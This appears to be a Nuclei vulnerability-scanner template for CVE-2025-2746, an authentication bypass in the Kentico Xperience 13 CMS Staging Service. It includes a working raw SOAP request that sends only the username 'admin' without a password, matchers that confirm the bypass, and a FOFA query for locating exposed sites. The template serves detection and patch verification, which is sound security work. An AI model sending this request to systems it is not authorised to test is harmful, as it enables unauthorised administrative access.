Vulnerability description
Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin).
id: CVE-2025-2746

info:
  name: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)
  author: DhiyaneshDK
  severity: critical
  description: |
    Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)
  impact: |
    Unauthenticated attackers can bypass authentication in the Staging Service using any username (or valid username depending on hotfix version), potentially gaining control of administrative objects and compromising the entire CMS.
  remediation: |
    Upgrade to Kentico Xperience 13 Hotfix 178 or later that properly validates Staging Service authentication.
  reference:
    - https://github.com/watchtowrlabs/kentico-xperience13-AuthBypass-wt-2025-0011
    - https://devnet.kentico.com/download/hotfixes
    - https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-2746
    cwe-id: CWE-287
    epss-score: 0.87412
    epss-percentile: 0.99428
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Kentico-CMS"
  tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,vuln,kev,vkev

variables:
  rand: "{{to_lower(rand_text_alpha(32))}}"

http:
  - raw:
      - |
        POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: text/xml; charset=utf-8
        SOAPAction: http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Header>
            <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
              <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
              </wsse:UsernameToken>
            </wsse:Security>
          </soap:Header>
          <soap:Body>
            <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
              <stagingTaskData><![CDATA[<{{rand}}>]]></stagingTaskData>
            </ProcessSynchronizationTaskData>
          </soap:Body>
        </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{rand}}"
          - "<wsa:Action>"
        condition: and

      - type: word
        part: body
        words:
          - "Site not running"
          - "SyncServer.ErrorLicense"
          - "SyncServer.ErrorServiceNotEnabled"
          - "Staging service is not enabled on this server"
          - "Staging does not work with blank password"
          - "Missing X509 certificate token"
          - "The security token could not be authenticated or authorized"
        condition: or
        negative: true

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4b0a00483046022100b24f712786d4392dadbb8078d0fe585550267d89423d39416eb1eb745317e542022100f34000ec8d8e0ad41f815f51512a9061906286ea75fa5a75a966ba66fa1ff1fe:922c64590222798bb761d5b6d8e72950